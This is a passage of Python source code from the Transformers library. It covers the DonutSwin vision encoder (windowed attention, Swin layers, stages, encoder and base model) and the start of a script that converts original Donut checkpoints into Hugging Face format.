        self.value = nn.Linear(self.all_head_size, self.all_head_size, bias=config.qkv_bias)

        self.dropout = nn.Dropout(config.attention_probs_dropout_prob)

    def transpose_for_scores(self, x):
        # (batch, seq, all_head_size) -> (batch, heads, seq, head_size)
        new_x_shape = x.size()[:-1] + (self.num_attention_heads, self.attention_head_size)
        x = x.view(new_x_shape)
        return x.permute(0, 2, 1, 3)

    def forward(
        self,
        hidden_states: torch.Tensor,
        attention_mask: Optional[torch.FloatTensor] = None,
        head_mask: Optional[torch.FloatTensor] = None,
        output_attentions: Optional[bool] = False,
    ) -> Tuple[torch.Tensor]:
        # Here `dim` is the sequence length (tokens per window), not channels.
        batch_size, dim, num_channels = hidden_states.shape
        mixed_query_layer = self.query(hidden_states)

        key_layer = self.transpose_for_scores(self.key(hidden_states))
        value_layer = self.transpose_for_scores(self.value(hidden_states))
        query_layer = self.transpose_for_scores(mixed_query_layer)

        # Take the dot product between "query" and "key" to get the raw attention scores.
        attention_scores = torch.matmul(query_layer, key_layer.transpose(-1, -2))

        attention_scores = attention_scores / math.sqrt(self.attention_head_size)
        # Look up the bias for every (query, key) pair in the window and add it
        # to the scores, broadcast over the batch dimension.
        relative_position_bias = self.relative_position_bias_table[self.relative_position_index.view(-1)]
        relative_position_bias = relative_position_bias.view(
            self.window_size[0] * self.window_size[1], self.window_size[0] * self.window_size[1], -1
        )

        relative_position_bias = relative_position_bias.permute(2, 0, 1).contiguous()
        attention_scores = attention_scores + relative_position_bias.unsqueeze(0)

        if attention_mask is not None:
            # Apply the attention mask is (precomputed for all layers in DonutSwinModel forward() function)
            mask_shape = attention_mask.shape[0]
            attention_scores = attention_scores.view(
                batch_size // mask_shape, mask_shape, self.num_attention_heads, dim, dim
            )
            attention_scores = attention_scores + attention_mask.unsqueeze(1).unsqueeze(0)
            attention_scores = attention_scores.view(-1, self.num_attention_heads, dim, dim)

        # Normalize the attention scores to probabilities.
        attention_probs = nn.functional.softmax(attention_scores, dim=-1)

        # This is actually dropping out entire tokens to attend to, which might
        # seem a bit unusual, but is taken from the original Transformer paper.
        attention_probs = self.dropout(attention_probs)

        # Mask heads if we want to
        if head_mask is not None:
            attention_probs = attention_probs * head_mask

        context_layer = torch.matmul(attention_probs, value_layer)
        context_layer = context_layer.permute(0, 2, 1, 3).contiguous()
        new_context_layer_shape = context_layer.size()[:-2] + (self.all_head_size,)
        context_layer = context_layer.view(new_context_layer_shape)

        outputs = (context_layer, attention_probs) if output_attentions else (context_layer,)

        return outputs
# Adapted from transformers.models.swin.modeling_swin.SwinSelfOutput
class DonutSwinSelfOutput(nn.Module):
    """Linear projection + dropout applied to the self-attention output.

    NOTE(review): the dropout rate comes from `attention_probs_dropout_prob`
    rather than `hidden_dropout_prob`; this mirrors the upstream Swin code.
    """

    def __init__(self, config, dim):
        super().__init__()
        self.dense = nn.Linear(dim, dim)
        self.dropout = nn.Dropout(config.attention_probs_dropout_prob)

    def forward(self, hidden_states: torch.Tensor, input_tensor: torch.Tensor) -> torch.Tensor:
        # `input_tensor` is accepted for interface parity with other attention
        # outputs but is not used here (no residual connection in this module).
        projected = self.dense(hidden_states)
        return self.dropout(projected)
# Copied from transformers.models.swin.modeling_swin.SwinAttention with Swin->DonutSwin
class DonutSwinAttention(nn.Module):
    """Windowed multi-head self-attention together with its output projection."""

    def __init__(self, config, dim, num_heads, window_size):
        super().__init__()
        self.self = DonutSwinSelfAttention(config, dim, num_heads, window_size)
        self.output = DonutSwinSelfOutput(config, dim)
        # Heads already removed by `prune_heads`; tracked so the same head
        # index is never pruned twice.
        self.pruned_heads = set()

    def prune_heads(self, heads):
        """Remove the given attention heads by slicing the q/k/v and output projections in place."""
        if len(heads) == 0:
            return
        heads, index = find_pruneable_heads_and_indices(
            heads, self.self.num_attention_heads, self.self.attention_head_size, self.pruned_heads
        )
        # Prune linear layers
        self.self.query = prune_linear_layer(self.self.query, index)
        self.self.key = prune_linear_layer(self.self.key, index)
        self.self.value = prune_linear_layer(self.self.value, index)
        # The output projection is pruned along its input dimension (dim=1).
        self.output.dense = prune_linear_layer(self.output.dense, index, dim=1)
        # Update hyper params and store pruned heads
        self.self.num_attention_heads = self.self.num_attention_heads - len(heads)
        self.self.all_head_size = self.self.attention_head_size * self.self.num_attention_heads
        self.pruned_heads = self.pruned_heads.union(heads)

    def forward(
        self,
        hidden_states: torch.Tensor,
        attention_mask: Optional[torch.FloatTensor] = None,
        head_mask: Optional[torch.FloatTensor] = None,
        output_attentions: Optional[bool] = False,
    ) -> Tuple[torch.Tensor]:
        # Returns (attention_output, [attention_probs if requested]).
        self_outputs = self.self(hidden_states, attention_mask, head_mask, output_attentions)
        attention_output = self.output(self_outputs[0], hidden_states)
        outputs = (attention_output,) + self_outputs[1:]  # add attentions if we output them
        return outputs
# Copied from transformers.models.swin.modeling_swin.SwinIntermediate
class DonutSwinIntermediate(nn.Module):
    """First half of the MLP block: expand ``dim`` by ``config.mlp_ratio`` and apply the activation."""

    def __init__(self, config, dim):
        super().__init__()
        self.dense = nn.Linear(dim, int(config.mlp_ratio * dim))
        # ``hidden_act`` may be a string key into ACT2FN or a callable.
        self.intermediate_act_fn = (
            ACT2FN[config.hidden_act] if isinstance(config.hidden_act, str) else config.hidden_act
        )

    def forward(self, hidden_states: torch.Tensor) -> torch.Tensor:
        return self.intermediate_act_fn(self.dense(hidden_states))
# Copied from transformers.models.swin.modeling_swin.SwinOutput
class DonutSwinOutput(nn.Module):
    """Second half of the MLP block: project back from the expanded width to ``dim``, then dropout."""

    def __init__(self, config, dim):
        super().__init__()
        # Mirror of DonutSwinIntermediate's expansion.
        self.dense = nn.Linear(int(config.mlp_ratio * dim), dim)
        self.dropout = nn.Dropout(config.hidden_dropout_prob)

    def forward(self, hidden_states: torch.Tensor) -> torch.Tensor:
        return self.dropout(self.dense(hidden_states))
# Copied from transformers.models.swin.modeling_swin.SwinLayer with Swin->DonutSwin
class DonutSwinLayer(nn.Module):
    """One Swin Transformer block: (shifted-)window attention followed by a pre-norm MLP.

    When `shift_size` > 0 the feature map is cyclically shifted before window
    partitioning (SW-MSA); otherwise plain window attention (W-MSA) is used.
    """

    def __init__(self, config, dim, input_resolution, num_heads, shift_size=0):
        super().__init__()
        self.chunk_size_feed_forward = config.chunk_size_feed_forward
        self.shift_size = shift_size
        self.window_size = config.window_size
        self.input_resolution = input_resolution
        self.layernorm_before = nn.LayerNorm(dim, eps=config.layer_norm_eps)
        self.attention = DonutSwinAttention(config, dim, num_heads, window_size=self.window_size)
        # Stochastic depth; identity when the configured rate is zero.
        self.drop_path = DonutSwinDropPath(config.drop_path_rate) if config.drop_path_rate > 0.0 else nn.Identity()
        self.layernorm_after = nn.LayerNorm(dim, eps=config.layer_norm_eps)
        self.intermediate = DonutSwinIntermediate(config, dim)
        self.output = DonutSwinOutput(config, dim)

    def set_shift_and_window_size(self, input_resolution):
        # Mutates `self.shift_size` / `self.window_size` for the current input.
        if min(input_resolution) <= self.window_size:
            # if window size is larger than input resolution, we don't partition windows
            self.shift_size = 0
            self.window_size = min(input_resolution)

    def get_attn_mask(self, height, width, dtype):
        """Build the additive attention mask (-100 across region boundaries) used for shifted windows."""
        if self.shift_size > 0:
            # calculate attention mask for SW-MSA
            img_mask = torch.zeros((1, height, width, 1), dtype=dtype)
            height_slices = (
                slice(0, -self.window_size),
                slice(-self.window_size, -self.shift_size),
                slice(-self.shift_size, None),
            )
            width_slices = (
                slice(0, -self.window_size),
                slice(-self.window_size, -self.shift_size),
                slice(-self.shift_size, None),
            )
            # Label each of the 3x3 spatial regions with a distinct id so that
            # pixels originating from different regions cannot attend to each other.
            count = 0
            for height_slice in height_slices:
                for width_slice in width_slices:
                    img_mask[:, height_slice, width_slice, :] = count
                    count += 1
            mask_windows = window_partition(img_mask, self.window_size)
            mask_windows = mask_windows.view(-1, self.window_size * self.window_size)
            attn_mask = mask_windows.unsqueeze(1) - mask_windows.unsqueeze(2)
            attn_mask = attn_mask.masked_fill(attn_mask != 0, float(-100.0)).masked_fill(attn_mask == 0, float(0.0))
        else:
            attn_mask = None
        return attn_mask

    def maybe_pad(self, hidden_states, height, width):
        # Right/bottom-pad so both spatial dims become multiples of the window size.
        pad_right = (self.window_size - width % self.window_size) % self.window_size
        pad_bottom = (self.window_size - height % self.window_size) % self.window_size
        pad_values = (0, 0, 0, pad_right, 0, pad_bottom)
        hidden_states = nn.functional.pad(hidden_states, pad_values)
        return hidden_states, pad_values

    def forward(
        self,
        hidden_states: torch.Tensor,
        input_dimensions: Tuple[int, int],
        head_mask: Optional[torch.FloatTensor] = None,
        output_attentions: Optional[bool] = False,
        always_partition: Optional[bool] = False,
    ) -> Tuple[torch.Tensor, torch.Tensor]:
        if not always_partition:
            self.set_shift_and_window_size(input_dimensions)
        else:
            pass
        height, width = input_dimensions
        batch_size, _, channels = hidden_states.size()
        shortcut = hidden_states
        hidden_states = self.layernorm_before(hidden_states)
        hidden_states = hidden_states.view(batch_size, height, width, channels)
        # pad hidden_states to multiples of window size
        hidden_states, pad_values = self.maybe_pad(hidden_states, height, width)
        _, height_pad, width_pad, _ = hidden_states.shape
        # cyclic shift
        if self.shift_size > 0:
            shifted_hidden_states = torch.roll(hidden_states, shifts=(-self.shift_size, -self.shift_size), dims=(1, 2))
        else:
            shifted_hidden_states = hidden_states
        # partition windows
        hidden_states_windows = window_partition(shifted_hidden_states, self.window_size)
        hidden_states_windows = hidden_states_windows.view(-1, self.window_size * self.window_size, channels)
        attn_mask = self.get_attn_mask(height_pad, width_pad, dtype=hidden_states.dtype)
        if attn_mask is not None:
            attn_mask = attn_mask.to(hidden_states_windows.device)
        attention_outputs = self.attention(
            hidden_states_windows, attn_mask, head_mask, output_attentions=output_attentions
        )
        attention_output = attention_outputs[0]
        attention_windows = attention_output.view(-1, self.window_size, self.window_size, channels)
        shifted_windows = window_reverse(attention_windows, self.window_size, height_pad, width_pad)
        # reverse cyclic shift
        if self.shift_size > 0:
            attention_windows = torch.roll(shifted_windows, shifts=(self.shift_size, self.shift_size), dims=(1, 2))
        else:
            attention_windows = shifted_windows
        # Undo any padding added by `maybe_pad` before flattening back.
        was_padded = pad_values[3] > 0 or pad_values[5] > 0
        if was_padded:
            attention_windows = attention_windows[:, :height, :width, :].contiguous()
        attention_windows = attention_windows.view(batch_size, height * width, channels)
        # Residual around attention, then pre-norm MLP with its own residual.
        hidden_states = shortcut + self.drop_path(attention_windows)
        layer_output = self.layernorm_after(hidden_states)
        layer_output = self.intermediate(layer_output)
        layer_output = hidden_states + self.output(layer_output)
        layer_outputs = (layer_output, attention_outputs[1]) if output_attentions else (layer_output,)
        return layer_outputs
# Copied from transformers.models.swin.modeling_swin.SwinStage with Swin->DonutSwin
class DonutSwinStage(nn.Module):
    """A stage of `depth` Swin blocks (alternating W-MSA / SW-MSA), optionally followed by patch merging."""

    def __init__(self, config, dim, input_resolution, depth, num_heads, drop_path, downsample):
        super().__init__()
        self.config = config
        self.dim = dim
        self.blocks = nn.ModuleList(
            [
                DonutSwinLayer(
                    config=config,
                    dim=dim,
                    input_resolution=input_resolution,
                    num_heads=num_heads,
                    # Even blocks use plain windows, odd blocks use shifted windows.
                    shift_size=0 if (i % 2 == 0) else config.window_size // 2,
                )
                for i in range(depth)
            ]
        )
        # patch merging layer
        if downsample is not None:
            self.downsample = downsample(input_resolution, dim=dim, norm_layer=nn.LayerNorm)
        else:
            self.downsample = None
        self.pointing = False

    def forward(
        self,
        hidden_states: torch.Tensor,
        input_dimensions: Tuple[int, int],
        head_mask: Optional[torch.FloatTensor] = None,
        output_attentions: Optional[bool] = False,
        always_partition: Optional[bool] = False,
    ) -> Tuple[torch.Tensor]:
        height, width = input_dimensions
        for i, layer_module in enumerate(self.blocks):
            layer_head_mask = head_mask[i] if head_mask is not None else None
            layer_outputs = layer_module(
                hidden_states, input_dimensions, layer_head_mask, output_attentions, always_partition
            )
            hidden_states = layer_outputs[0]
        # Keep the pre-downsampling states so callers can expose them as hidden states.
        hidden_states_before_downsampling = hidden_states
        if self.downsample is not None:
            height_downsampled, width_downsampled = (height + 1) // 2, (width + 1) // 2
            output_dimensions = (height, width, height_downsampled, width_downsampled)
            hidden_states = self.downsample(hidden_states_before_downsampling, input_dimensions)
        else:
            output_dimensions = (height, width, height, width)
        stage_outputs = (hidden_states, hidden_states_before_downsampling, output_dimensions)
        if output_attentions:
            # Note: only the attentions of the *last* block in the stage are
            # appended here (layer_outputs holds the final loop iteration).
            stage_outputs += layer_outputs[1:]
        return stage_outputs
# Copied from transformers.models.swin.modeling_swin.SwinEncoder with Swin->DonutSwin
class DonutSwinEncoder(nn.Module):
    """Stack of `DonutSwinStage`s; channel width doubles and resolution halves between stages."""

    def __init__(self, config, grid_size):
        super().__init__()
        self.num_layers = len(config.depths)
        self.config = config
        # Per-block stochastic-depth rates, linearly increasing over all blocks.
        dpr = [x.item() for x in torch.linspace(0, config.drop_path_rate, sum(config.depths))]
        self.layers = nn.ModuleList(
            [
                DonutSwinStage(
                    config=config,
                    dim=int(config.embed_dim * 2**i_layer),
                    input_resolution=(grid_size[0] // (2**i_layer), grid_size[1] // (2**i_layer)),
                    depth=config.depths[i_layer],
                    num_heads=config.num_heads[i_layer],
                    drop_path=dpr[sum(config.depths[:i_layer]) : sum(config.depths[: i_layer + 1])],
                    downsample=DonutSwinPatchMerging if (i_layer < self.num_layers - 1) else None,
                )
                for i_layer in range(self.num_layers)
            ]
        )
        self.gradient_checkpointing = False

    def forward(
        self,
        hidden_states: torch.Tensor,
        input_dimensions: Tuple[int, int],
        head_mask: Optional[torch.FloatTensor] = None,
        output_attentions: Optional[bool] = False,
        output_hidden_states: Optional[bool] = False,
        output_hidden_states_before_downsampling: Optional[bool] = False,
        always_partition: Optional[bool] = False,
        return_dict: Optional[bool] = True,
    ) -> Union[Tuple, DonutSwinEncoderOutput]:
        all_hidden_states = () if output_hidden_states else None
        all_reshaped_hidden_states = () if output_hidden_states else None
        all_self_attentions = () if output_attentions else None
        if output_hidden_states:
            batch_size, _, hidden_size = hidden_states.shape
            # rearrange b (h w) c -> b c h w
            reshaped_hidden_state = hidden_states.view(batch_size, *input_dimensions, hidden_size)
            reshaped_hidden_state = reshaped_hidden_state.permute(0, 3, 1, 2)
            all_hidden_states += (hidden_states,)
            all_reshaped_hidden_states += (reshaped_hidden_state,)
        for i, layer_module in enumerate(self.layers):
            layer_head_mask = head_mask[i] if head_mask is not None else None
            if self.gradient_checkpointing and self.training:
                # Recompute activations in the backward pass to save memory.
                def create_custom_forward(module):
                    def custom_forward(*inputs):
                        return module(*inputs, output_attentions)

                    return custom_forward

                layer_outputs = torch.utils.checkpoint.checkpoint(
                    create_custom_forward(layer_module), hidden_states, input_dimensions, layer_head_mask
                )
            else:
                layer_outputs = layer_module(
                    hidden_states, input_dimensions, layer_head_mask, output_attentions, always_partition
                )
            hidden_states = layer_outputs[0]
            hidden_states_before_downsampling = layer_outputs[1]
            output_dimensions = layer_outputs[2]
            # The downsampled resolution becomes the next stage's input size.
            input_dimensions = (output_dimensions[-2], output_dimensions[-1])
            if output_hidden_states and output_hidden_states_before_downsampling:
                batch_size, _, hidden_size = hidden_states_before_downsampling.shape
                # rearrange b (h w) c -> b c h w
                # here we use the original (not downsampled) height and width
                reshaped_hidden_state = hidden_states_before_downsampling.view(
                    batch_size, *(output_dimensions[0], output_dimensions[1]), hidden_size
                )
                reshaped_hidden_state = reshaped_hidden_state.permute(0, 3, 1, 2)
                all_hidden_states += (hidden_states_before_downsampling,)
                all_reshaped_hidden_states += (reshaped_hidden_state,)
            elif output_hidden_states and not output_hidden_states_before_downsampling:
                batch_size, _, hidden_size = hidden_states.shape
                # rearrange b (h w) c -> b c h w
                reshaped_hidden_state = hidden_states.view(batch_size, *input_dimensions, hidden_size)
                reshaped_hidden_state = reshaped_hidden_state.permute(0, 3, 1, 2)
                all_hidden_states += (hidden_states,)
                all_reshaped_hidden_states += (reshaped_hidden_state,)
            if output_attentions:
                all_self_attentions += layer_outputs[3:]
        if not return_dict:
            return tuple(v for v in [hidden_states, all_hidden_states, all_self_attentions] if v is not None)
        return DonutSwinEncoderOutput(
            last_hidden_state=hidden_states,
            hidden_states=all_hidden_states,
            attentions=all_self_attentions,
            reshaped_hidden_states=all_reshaped_hidden_states,
        )
# Copied from transformers.models.swin.modeling_swin.SwinPreTrainedModel with Swin->DonutSwin
class DonutSwinPreTrainedModel(PreTrainedModel):
    """
    An abstract class to handle weights initialization and a simple interface for downloading and loading pretrained
    models.
    """

    # Class attributes consumed by the PreTrainedModel machinery.
    config_class = DonutSwinConfig
    base_model_prefix = "swin"
    main_input_name = "pixel_values"
    supports_gradient_checkpointing = True

    def _init_weights(self, module):
        """Initialize the weights"""
        if isinstance(module, (nn.Linear, nn.Conv2d)):
            # Slightly different from the TF version which uses truncated_normal for initialization
            # cf https://github.com/pytorch/pytorch/pull/5617
            module.weight.data.normal_(mean=0.0, std=self.config.initializer_range)
            if module.bias is not None:
                module.bias.data.zero_()
        elif isinstance(module, nn.LayerNorm):
            # LayerNorm starts out as the identity transform.
            module.bias.data.zero_()
            module.weight.data.fill_(1.0)

    def _set_gradient_checkpointing(self, module, value=False):
        # Only the encoder supports gradient checkpointing.
        if isinstance(module, DonutSwinEncoder):
            module.gradient_checkpointing = value
SWIN_START_DOCSTRING = r"""
This model is a PyTorch [torch.nn.Module](https://pytorch.org/docs/stable/nn.html#torch.nn.Module) sub-class. Use
it as a regular PyTorch Module and refer to the PyTorch documentation for all matter related to general usage and
behavior.
Parameters:
config ([`DonutSwinConfig`]): Model configuration class with all the parameters of the model.
Initializing with a config file does not load the weights associated with the model, only the
configuration. Check out the [`~PreTrainedModel.from_pretrained`] method to load the model weights.
"""
SWIN_INPUTS_DOCSTRING = r"""
Args:
pixel_values (`torch.FloatTensor` of shape `(batch_size, num_channels, height, width)`):
Pixel values. Pixel values can be obtained using [`AutoImageProcessor`]. See
[`DonutImageProcessor.__call__`] for details.
head_mask (`torch.FloatTensor` of shape `(num_heads,)` or `(num_layers, num_heads)`, *optional*):
Mask to nullify selected heads of the self-attention modules. Mask values selected in `[0, 1]`:
- 1 indicates the head is **not masked**,
- 0 indicates the head is **masked**.
output_attentions (`bool`, *optional*):
Whether or not to return the attentions tensors of all attention layers. See `attentions` under returned
tensors for more detail.
output_hidden_states (`bool`, *optional*):
Whether or not to return the hidden states of all layers. See `hidden_states` under returned tensors for
more detail.
return_dict (`bool`, *optional*):
Whether or not to return a [`~utils.ModelOutput`] instead of a plain tuple.
"""
@add_start_docstrings(
    "The bare Donut Swin Model transformer outputting raw hidden-states without any specific head on top.",
    SWIN_START_DOCSTRING,
)
class DonutSwinModel(DonutSwinPreTrainedModel):
    """Patch embeddings + Swin encoder + optional average pooler."""

    def __init__(self, config, add_pooling_layer=True, use_mask_token=False):
        super().__init__(config)
        self.config = config
        self.num_layers = len(config.depths)
        # Channel width of the final stage (embed_dim doubles at each stage).
        self.num_features = int(config.embed_dim * 2 ** (self.num_layers - 1))
        self.embeddings = DonutSwinEmbeddings(config, use_mask_token=use_mask_token)
        self.encoder = DonutSwinEncoder(config, self.embeddings.patch_grid)
        # Mean-pools the sequence dimension into one vector per image.
        self.pooler = nn.AdaptiveAvgPool1d(1) if add_pooling_layer else None
        # Initialize weights and apply final processing
        self.post_init()

    def get_input_embeddings(self):
        return self.embeddings.patch_embeddings

    def _prune_heads(self, heads_to_prune):
        """
        Prunes heads of the model. heads_to_prune: dict of {layer_num: list of heads to prune in this layer} See base
        class PreTrainedModel
        """
        for layer, heads in heads_to_prune.items():
            self.encoder.layer[layer].attention.prune_heads(heads)

    @add_start_docstrings_to_model_forward(SWIN_INPUTS_DOCSTRING)
    @add_code_sample_docstrings(
        checkpoint=_CHECKPOINT_FOR_DOC,
        output_type=DonutSwinModelOutput,
        config_class=_CONFIG_FOR_DOC,
        modality="vision",
        expected_output=_EXPECTED_OUTPUT_SHAPE,
    )
    def forward(
        self,
        pixel_values: Optional[torch.FloatTensor] = None,
        bool_masked_pos: Optional[torch.BoolTensor] = None,
        head_mask: Optional[torch.FloatTensor] = None,
        output_attentions: Optional[bool] = None,
        output_hidden_states: Optional[bool] = None,
        return_dict: Optional[bool] = None,
    ) -> Union[Tuple, DonutSwinModelOutput]:
        # Fall back to config defaults for any unset output flags.
        output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions
        output_hidden_states = (
            output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states
        )
        return_dict = return_dict if return_dict is not None else self.config.use_return_dict
        if pixel_values is None:
            raise ValueError("You have to specify pixel_values")
        # Prepare head mask if needed
        # 1.0 in head_mask indicate we keep the head
        # attention_probs has shape bsz x n_heads x N x N
        # input head_mask has shape [num_heads] or [num_hidden_layers x num_heads]
        # and head_mask is converted to shape [num_hidden_layers x batch x num_heads x seq_length x seq_length]
        head_mask = self.get_head_mask(head_mask, len(self.config.depths))
        embedding_output, input_dimensions = self.embeddings(pixel_values, bool_masked_pos=bool_masked_pos)
        encoder_outputs = self.encoder(
            embedding_output,
            input_dimensions,
            head_mask=head_mask,
            output_attentions=output_attentions,
            output_hidden_states=output_hidden_states,
            return_dict=return_dict,
        )
        sequence_output = encoder_outputs[0]
        pooled_output = None
        if self.pooler is not None:
            # (batch, seq, dim) -> (batch, dim, seq) -> (batch, dim, 1) -> (batch, dim)
            pooled_output = self.pooler(sequence_output.transpose(1, 2))
            pooled_output = torch.flatten(pooled_output, 1)
        if not return_dict:
            output = (sequence_output, pooled_output) + encoder_outputs[1:]
            return output
        return DonutSwinModelOutput(
            last_hidden_state=sequence_output,
            pooler_output=pooled_output,
            hidden_states=encoder_outputs.hidden_states,
            attentions=encoder_outputs.attentions,
            reshaped_hidden_states=encoder_outputs.reshaped_hidden_states,
        )
|
27182812/ChatGLM-LLaMA-chinese-insturct | 9,321 | src/transformers/models/donut/convert_donut_to_pytorch.py | # coding=utf-8
# Copyright 2022 The HuggingFace Inc. team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Convert Donut checkpoints using the original `donut-python` library. URL: https://github.com/clovaai/donut"""
import argparse
import torch
from datasets import load_dataset
from donut import DonutModel
from transformers import (
DonutFeatureExtractor,
DonutProcessor,
DonutSwinConfig,
DonutSwinModel,
MBartConfig,
MBartForCausalLM,
VisionEncoderDecoderModel,
XLMRobertaTokenizerFast,
)
def get_configs(model):
    """Derive the HF encoder/decoder configs from an original ``DonutModel``'s config."""
    donut_config = model.config
    encoder_config = DonutSwinConfig(
        image_size=donut_config.input_size,
        patch_size=4,
        depths=donut_config.encoder_layer,
        num_heads=[4, 8, 16, 32],
        window_size=donut_config.window_size,
        embed_dim=128,
    )
    decoder_config = MBartConfig(
        is_decoder=True,
        is_encoder_decoder=False,
        add_cross_attention=True,
        decoder_layers=donut_config.decoder_layer,
        max_position_embeddings=donut_config.max_position_embeddings,
        # several special tokens are added to the vocab of XLMRobertaTokenizer,
        # see repo on the hub (added_tokens.json)
        vocab_size=len(model.decoder.tokenizer),
        scale_embedding=True,
        add_final_layer_norm=True,
    )
    return encoder_config, decoder_config
def rename_key(name):
    """Map an original donut-python parameter name to its HF Transformers equivalent."""
    # Strip the wrapper module names and remap the patch embedding.
    for old, new in (
        ("encoder.model", "encoder"),
        ("decoder.model", "decoder"),
        ("patch_embed.proj", "embeddings.patch_embeddings.projection"),
        ("patch_embed.norm", "embeddings.norm"),
    ):
        if old in name:
            name = name.replace(old, new)
    if name.startswith("encoder"):
        if "layers" in name:
            name = "encoder." + name
        if "attn.proj" in name:
            name = name.replace("attn.proj", "attention.output.dense")
        # Keys containing "mask" (attn_mask buffers) keep their original naming.
        if "attn" in name and "mask" not in name:
            name = name.replace("attn", "attention.self")
        for old, new in (
            ("norm1", "layernorm_before"),
            ("norm2", "layernorm_after"),
            ("mlp.fc1", "intermediate.dense"),
            ("mlp.fc2", "output.dense"),
        ):
            if old in name:
                name = name.replace(old, new)
        if name == "encoder.norm.weight":
            name = "encoder.layernorm.weight"
        if name == "encoder.norm.bias":
            name = "encoder.layernorm.bias"
    return name
def convert_state_dict(orig_state_dict, model):
    """Rewrite the original donut-python state dict so its keys match the HF model.

    Fused ``qkv`` projections are split into separate query/key/value tensors,
    ``attn_mask`` buffers and the encoder's final LayerNorm are dropped, and all
    remaining keys are renamed via `rename_key`. The dict is modified in place
    and also returned.
    """
    for key in orig_state_dict.copy().keys():
        val = orig_state_dict.pop(key)
        if "qkv" in key:
            # Keys look like "encoder.model.layers.<L>.blocks.<B>.attn.qkv.{weight,bias}".
            key_split = key.split(".")
            layer_num = int(key_split[3])
            block_num = int(key_split[5])
            dim = model.encoder.encoder.layers[layer_num].blocks[block_num].attention.self.all_head_size
            if "weight" in key:
                # The fused matrix is stacked [query; key; value] along dim 0.
                orig_state_dict[
                    f"encoder.encoder.layers.{layer_num}.blocks.{block_num}.attention.self.query.weight"
                ] = val[:dim, :]
                orig_state_dict[
                    f"encoder.encoder.layers.{layer_num}.blocks.{block_num}.attention.self.key.weight"
                ] = val[dim : dim * 2, :]
                orig_state_dict[
                    f"encoder.encoder.layers.{layer_num}.blocks.{block_num}.attention.self.value.weight"
                ] = val[-dim:, :]
            else:
                # Same split for the fused bias vector.
                orig_state_dict[
                    f"encoder.encoder.layers.{layer_num}.blocks.{block_num}.attention.self.query.bias"
                ] = val[:dim]
                orig_state_dict[
                    f"encoder.encoder.layers.{layer_num}.blocks.{block_num}.attention.self.key.bias"
                ] = val[dim : dim * 2]
                orig_state_dict[
                    f"encoder.encoder.layers.{layer_num}.blocks.{block_num}.attention.self.value.bias"
                ] = val[-dim:]
        elif "attn_mask" in key or key in ["encoder.model.norm.weight", "encoder.model.norm.bias"]:
            # HuggingFace implementation doesn't use attn_mask buffer
            # and model doesn't use final LayerNorms for the encoder
            pass
        else:
            orig_state_dict[rename_key(key)] = val
    return orig_state_dict
def convert_donut_checkpoint(model_name, pytorch_dump_folder_path=None, push_to_hub=False):
    """Convert an original donut-python checkpoint into a HF `VisionEncoderDecoderModel`.

    Loads the original model, copies its weights into a freshly built HF model,
    checks that patch embeddings, encoder hidden states and decoder logits match
    on a sample document, then optionally saves the result and/or pushes it to
    the hub.
    """
    # load original model
    original_model = DonutModel.from_pretrained(model_name).eval()
    # load HuggingFace model
    encoder_config, decoder_config = get_configs(original_model)
    encoder = DonutSwinModel(encoder_config)
    decoder = MBartForCausalLM(decoder_config)
    model = VisionEncoderDecoderModel(encoder=encoder, decoder=decoder)
    model.eval()
    state_dict = original_model.state_dict()
    new_state_dict = convert_state_dict(state_dict, model)
    model.load_state_dict(new_state_dict)
    # verify results on scanned document
    dataset = load_dataset("hf-internal-testing/example-documents")
    image = dataset["test"][0]["image"].convert("RGB")
    tokenizer = XLMRobertaTokenizerFast.from_pretrained(model_name, from_slow=True)
    # The original config stores (width, height); the feature extractor expects
    # the reversed order.
    feature_extractor = DonutFeatureExtractor(
        do_align_long_axis=original_model.config.align_long_axis, size=original_model.config.input_size[::-1]
    )
    processor = DonutProcessor(feature_extractor, tokenizer)
    pixel_values = processor(image, return_tensors="pt").pixel_values
    # Pick the task prompt matching the fine-tuned checkpoint being converted.
    if model_name == "naver-clova-ix/donut-base-finetuned-docvqa":
        task_prompt = "<s_docvqa><s_question>{user_input}</s_question><s_answer>"
        question = "When is the coffee break?"
        task_prompt = task_prompt.replace("{user_input}", question)
    elif model_name == "naver-clova-ix/donut-base-finetuned-rvlcdip":
        task_prompt = "<s_rvlcdip>"
    elif model_name in [
        "naver-clova-ix/donut-base-finetuned-cord-v1",
        "naver-clova-ix/donut-base-finetuned-cord-v1-2560",
    ]:
        task_prompt = "<s_cord>"
    elif model_name == "naver-clova-ix/donut-base-finetuned-cord-v2":
        # NOTE(review): this prompt appears to be missing the leading "<"
        # ("<s_cord-v2>"); kept as-is to match the original script — confirm
        # against the checkpoint's added tokens before changing it.
        task_prompt = "s_cord-v2>"
    elif model_name == "naver-clova-ix/donut-base-finetuned-zhtrainticket":
        task_prompt = "<s_zhtrainticket>"
    elif model_name in ["naver-clova-ix/donut-proto", "naver-clova-ix/donut-base"]:
        # use a random prompt
        task_prompt = "hello world"
    else:
        raise ValueError("Model name not supported")
    prompt_tensors = original_model.decoder.tokenizer(task_prompt, add_special_tokens=False, return_tensors="pt")[
        "input_ids"
    ]
    # Sanity checks: original and converted models must agree numerically.
    original_patch_embed = original_model.encoder.model.patch_embed(pixel_values)
    patch_embeddings, _ = model.encoder.embeddings(pixel_values)
    assert torch.allclose(original_patch_embed, patch_embeddings, atol=1e-3)
    # verify encoder hidden states
    original_last_hidden_state = original_model.encoder(pixel_values)
    last_hidden_state = model.encoder(pixel_values).last_hidden_state
    assert torch.allclose(original_last_hidden_state, last_hidden_state, atol=1e-2)
    # verify decoder hidden states
    original_logits = original_model(pixel_values, prompt_tensors, None).logits
    logits = model(pixel_values, decoder_input_ids=prompt_tensors).logits
    assert torch.allclose(original_logits, logits, atol=1e-3)
    print("Looks ok!")
    if pytorch_dump_folder_path is not None:
        print(f"Saving model and processor to {pytorch_dump_folder_path}")
        model.save_pretrained(pytorch_dump_folder_path)
        processor.save_pretrained(pytorch_dump_folder_path)
    if push_to_hub:
        model.push_to_hub("nielsr/" + model_name.split("/")[-1], commit_message="Update model")
        processor.push_to_hub("nielsr/" + model_name.split("/")[-1], commit_message="Update model")
if __name__ == "__main__":
